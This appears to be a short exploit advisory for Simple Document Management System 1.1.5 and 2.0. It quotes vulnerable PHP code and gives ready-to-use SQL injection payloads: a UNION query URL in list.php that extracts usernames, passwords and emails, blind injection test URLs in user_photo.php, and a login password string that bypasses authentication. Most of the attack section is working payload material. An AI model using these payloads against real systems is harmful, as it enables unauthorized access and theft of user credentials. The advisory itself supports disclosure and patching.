Simple Document Management System 1.1.5 / 2.0 SQL Injection

`Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities  
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS  
  
twitter: @JossGongora  
  
contact: sys-project[at]hotmail[dot]com  
website: http://www.hack0wn.com/  
  
download: http://mirror.us.cc.com.au/pub/cafuego/sdms  
  
-----------  
version 2.0  
-----------  
  
~~ [Multiple SQL]  
  
/list.php?folder_id=['foo]  
/detail.php?doc_id=['foo]  
  
<code>  
line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];  
...  
line 48: if(isset($order)) {  
$query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);  
} else {  
$query = "SELECT id,name FROM folders WHERE parent=$folder_id";  
}  
</code>  
  
.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--  
  
  
~~ [Blind]  
  
/user_photo.php?view=[foo]  
  
<code>  
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];  
$res = mysql_query($query, $sql);  
if( mysql_num_rows($res) == 1 ) {  
$row = mysql_fetch_array($res);  
header( "Content-type: $row[mime]" );  
echo "". base64_decode($row[photo]) ."";  
} else {  
echo "Badness!\n";  
}  
</code>  
  
.poc! :: /user_photo.php?view=2+and+1=1  
/user_photo.php?view=2+and+1=2  
  
  
-------------  
version 1.1.5  
-------------  
  
~~ [Auth Bypass]  
  
/login.php  
  
<code>  
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");  
$row = @mysql_fetch_array($result);  
if( $row[0] != 0 ) {  
header("Location: index.php");  
exit;  
}  
  
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");  
$row = @mysql_fetch_array($result);  
$id = $row[id];  
$name = $row[name];  
</code>  
  
.xpl! :: user: Admin  
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --  
  
  
__h0__  
`